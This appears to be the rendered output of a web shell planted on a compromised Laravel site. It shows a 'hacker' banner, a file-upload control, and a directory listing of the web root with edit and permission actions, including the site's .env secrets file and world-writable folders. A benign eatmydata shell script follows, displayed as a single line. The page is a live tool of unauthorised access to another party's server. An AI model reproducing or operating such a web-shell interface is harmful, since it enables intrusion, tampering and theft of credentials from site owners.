I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
#!/bin/sh #- # Copyright © 2014 # Thorsten “mirabilos” Glaser # # Provided that these terms and disclaimer and all copyright notices # are retained or reproduced in an accompanying document, permission # is granted to deal in this work without restriction, including un‐ # limited rights to use, publicly perform, distribute, sell, modify, # merge, give away, or sublicence. # # This work is provided “AS IS” and WITHOUT WARRANTY of any kind, to # the utmost extent permitted by applicable law, neither express nor # implied; without malicious intent or gross negligence. In no event # may a licensor, author or contributor be held liable for indirect, # direct, other damage, loss, or other issues arising in any way out # of dealing in the work, even if advised of the possibility of such # damage or existence of a defect, except proven that it results out # of said person’s immediate fault when using the work as intended. #- # eatmydata utility / wrapper compatible with both 26 and 82 series, # but only on Debian systems. usage() { echo >&2 "usage: $0 [--] command [arg ...]" exit 2 } # everything in a function to avoid environment pollution runprog() { local cmd me spath saveIFS pathelem tgt rltgt # Detect operation mode. If this script is run via a symbolic link, # look for the basename in the PATH and execute that. if test -L "$0"; then # symlink mode cmd=$(basename "$0") else # regular mode test x"$1" = x"--" && shift test -n "$1" || usage cmd=$1 shift fi # detect command to run, if necessary case $cmd in (*/*) ;; (*) # $cmd does not contain a '/' # look in the PATH but avoid loops with myself me=$(readlink -f "$0") # append :/dev/null both to catch a trailing colon # and for an easy abort condition spath=$PATH:/dev/null saveIFS=$IFS IFS=: for pathelem in $spath; do if test x"$pathelem" = x"/dev/null"; then echo >&2 E: eatmydata: \ "unable to find '$cmd' in PATH" exit 1 fi tgt=${pathelem:-.}/$cmd if test -x "$tgt"; then # still call whathever is in the path, even if it is a link, # as there are programs relying on argv[0] content. rltgt=$(readlink -f "$tgt") test x"$rltgt" = x"$me" || break fi done IFS=$saveIFS cmd=$tgt ;; esac # set up environment LD_LIBRARY_PATH=${LD_LIBRARY_PATH:+"$LD_LIBRARY_PATH:"}/usr/lib/libeatmydata LD_PRELOAD=${LD_PRELOAD:+"$LD_PRELOAD "}libeatmydata.so export LD_LIBRARY_PATH LD_PRELOAD # execute the command exec "$cmd" "$@" } runprog "$@"